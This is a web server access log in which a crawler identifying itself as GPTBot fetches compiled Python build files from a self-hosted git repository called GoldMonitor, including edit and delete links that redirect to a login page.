"Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:18:38:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 9837] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:18:38:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 9837] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:18:38:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 940] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:18:38:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 940] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:18:38:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 1624] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:18:38:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 1624] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:18:38:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 940] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:18:38:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 940] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:18:38:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 938] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:18:38:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 938] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:18:38:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 6151] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:18:38:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 6151] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:18:38:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 6151] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:18:38:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 938] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:18:38:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 4858] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:18:38:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 4858] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:18:38:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 4858] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:18:38:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 940] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:18:38:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 11156] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs" -[17/Feb/2026:18:38:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 9837] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:18:38:13 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:18:38:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:18:38:13 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:18:38:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:18:38:14 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:18:38:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:18:38:14 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:18:38:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:18:38:15 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:18:38:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:18:38:15 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:18:38:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:18:38:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:18:38:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:18:38:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:18:38:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:18:38:17 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:18:38:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:18:38:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 9835] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:18:38:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 940] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:18:38:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 1624] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:18:38:19 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:18:38:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:18:38:20 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:18:38:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:18:38:20 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:18:38:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:18:38:21 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:18:38:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:18:38:21 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:18:38:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:18:38:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:18:38:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:18:38:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:18:38:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:18:38:23 